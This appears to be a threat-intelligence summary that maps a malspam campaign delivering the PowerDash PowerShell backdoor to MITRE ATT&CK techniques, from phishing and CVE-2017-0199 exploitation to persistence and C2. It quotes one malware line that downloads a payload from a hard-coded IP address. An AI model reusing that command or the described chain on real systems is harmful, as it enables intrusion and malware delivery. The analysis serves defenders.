Malspam campaign delivering PowerDash – a tiny PowerShell backdoor

MITRE Techniques

• [T1566.001] Phishing: Spearphishing Attachment – The lure email is fairly short and asks for price quotas on the attached inquiry. “The lure email is fairly short. It asks the recipient to provide price quotas on the inquiry attached to the email.”
• [T1203] Exploitation for Client Execution – The Word document exploits CVE-2017-0199 to fetch an additional HTA payload from a remote location. “The attachment is a MS Word document that exploits the CVE-2017-0199 vulnerability and fetches an additional HTA payload from a remote location.”
• [T1059.001] PowerShell – The HTA payload fetches and executes a PowerShell payload (stager) from the same host. “The HTA payload fetches and executes a PowerShell payload (stager) from the same host.”
• [T1059.005] VBScript – The malware uses VBScript to initiate PowerShell. “VBScript -> PowerShell”
• [T1547.001] Registry Run Keys/Startup Folder – Persistence via an Autorun registry key and mshta.exe execution. “adding an entry to the Autorun registry key to execute it using mshta.exe.”
• [T1218.005] Mshta – Execution via mshta.exe during persistence and final payload loading. “mshta.exe” is invoked to run dropped payloads.
• [T1082] System Information Discovery – The stager collects host information before contacting the C2. “collect a bunch of information about the host and then contacts the C2 for commands to execute.”
• [T1071.001] Web Protocols – C2 communications occur over HTTP(S) via the /dash endpoints. “What’s interesting for us is the /dash/ route – that’s the endpoint infected bots talk to.”
• [T1105] Ingress Tool Transfer – The stager downloads and writes payloads (e.g., PowerDash stager and final payload). “DownloadFile(‘http://5.63.152.179/pl/2ht/8164’, $Pth);”